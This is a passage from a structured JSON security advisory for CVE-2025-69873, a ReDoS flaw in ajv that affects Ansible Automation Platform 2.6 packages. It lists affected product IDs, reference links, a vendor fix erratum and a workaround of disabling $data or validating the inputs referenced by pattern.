"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
